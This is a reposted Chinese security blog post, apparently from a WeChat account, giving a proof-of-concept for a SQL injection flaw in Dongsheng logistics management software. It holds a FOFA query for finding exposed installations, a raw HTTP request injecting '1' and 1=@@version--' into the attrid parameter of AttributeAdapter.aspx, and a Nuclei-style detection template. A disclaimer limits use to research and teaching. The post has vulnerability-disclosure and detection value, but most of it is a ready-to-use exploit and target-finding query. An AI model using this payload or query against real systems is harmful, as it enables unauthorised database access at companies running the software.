fofa-query: body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
GET /FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20-- HTTP/1.1
Host: 10.211.55.3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15-620
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate, br
id: Dongsheng-Logistics-Software-AttributeAdapter-SQLi
info:
name: 东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞
author: Simple
severity: medium
description: |
东胜物流软件是青岛东胜伟业软件有限公司一款集订单管理、仓库管理、运输管理等多种功能于一体的物流管理软件。东胜物流信息管理系统 AttributeAdapter.aspx 存在SQL注入漏洞,攻击者可以通过该漏洞获取数据库敏感信息。
reference:
- https://github.com/JJThome
metadata:
fofa-query: body="FeeCodes/CompanysAdapter.aspx" || body="dhtmlxcombo_whp.js" || body="dongshengsoft" || body="theme/dhtmlxcombo.css"
http:
- method: GET
path:
- "{{BaseURL}}/FeeCodes/AttributeAdapter.aspx?handle=attrinfo&attrid=1%27%20and%201=@@version%20--"
matchers:
- type: dsl
dsl:
- contains(body,"nvarchar")
- contains(body,"Microsoft SQL Server")
- status_code == 500
condition: and
原文始发于微信公众号(simple学安全):东胜物流软件 AttributeAdapter.aspx SQL 注入漏洞POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论